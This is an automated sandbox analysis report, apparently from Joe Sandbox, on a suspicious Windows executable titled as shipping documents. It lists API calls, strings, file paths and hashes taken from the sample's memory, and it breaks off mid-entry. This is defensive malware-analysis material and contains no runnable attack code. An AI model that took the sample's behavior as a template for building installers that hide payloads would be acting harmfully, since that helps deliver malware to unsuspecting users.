                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                                                • ShowWindow.USER32(?,00000005), ref: 00404D5E
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                                                • GlobalFree.KERNEL32(?), ref: 00404F3E
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
                                                • ShowWindow.USER32(?,00000000), ref: 004050DD
                                                • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                                                • ShowWindow.USER32(00000000), ref: 004050EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
                                                • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                                                • Opcode Fuzzy Hash: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
                                                • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404617
                                                • SetWindowTextW.USER32(00000000,?), ref: 00404641
                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                                                • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                                                • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 0040472F
                                                • lstrcatW.KERNEL32(?,Call), ref: 0040473B
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                                                  • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                  • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
                                                  • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206
                                                • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                                                • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                • String ID: 4Te$A$C:\Users\user\Uploadable\normallnnens$Call
                                                • API String ID: 2246997448-2930822779
                                                • Opcode ID: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
                                                • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                                                • Opcode Fuzzy Hash: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
                                                • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                                                APIs
                                                • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                Strings
                                                • C:\Users\user\Uploadable\normallnnens, xrefs: 004020F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\Uploadable\normallnnens
                                                • API String ID: 542301482-2478767733
                                                • Opcode ID: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
                                                • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
                                                • Opcode Fuzzy Hash: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
                                                • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
                                                • Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
                                                • Opcode Fuzzy Hash: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
                                                • Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
                                                • GetSysColor.USER32(?), ref: 004043AA
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                                                • lstrlenW.KERNEL32(?), ref: 004043CB
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404446
                                                • SendMessageW.USER32(00000000), ref: 0040444D
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404478
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                                                • SetCursor.USER32(00000000), ref: 004044CC
                                                • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                                                • SetCursor.USER32(00000000), ref: 004044F0
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: 4Te$AB@$Call$N$open
                                                • API String ID: 3615053054-1531013243
                                                • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                                                • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                                                • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                                                APIs
                                                • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C16
                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
                                                • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                                                  • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                  • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                                                • wsprintfA.USER32 ref: 00405C7E
                                                • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                                                • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                                                • CloseHandle.KERNEL32(00000000), ref: 00405D76
                                                  • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00405B58
                                                  • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                • API String ID: 1265525490-3322868524
                                                • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                                                • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
                                                • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                • CharNextW.USER32(?,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040617D, 00406182
                                                • *?|<>/":, xrefs: 004061CE
                                                • "C:\Users\user\Desktop\Shipping documents 000293994900.exe", xrefs: 004061C0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\Shipping documents 000293994900.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-3398266298
                                                • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                                                • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000400,?,?,00000021), ref: 0040252D
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000400,?,?,00000021), ref: 00402534
                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402566
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritelstrlen
                                                • String ID: 8$C:\Users\user\AppData\Local\Temp\nsvB4E.tmp$C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll
                                                • API String ID: 1453599865-3797316290
                                                • Opcode ID: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
                                                • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                                                • Opcode Fuzzy Hash: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
                                                • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                                                • GetSysColor.USER32(00000000), ref: 004041CD
                                                • SetTextColor.GDI32(?,00000000), ref: 004041D9
                                                • SetBkMode.GDI32(?,?), ref: 004041E5
                                                • GetSysColor.USER32(?), ref: 004041F8
                                                • SetBkColor.GDI32(?,?), ref: 00404208
                                                • DeleteObject.GDI32(?), ref: 00404222
                                                • CreateBrushIndirect.GDI32(?), ref: 0040422C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                                                • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                                                  • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                Strings
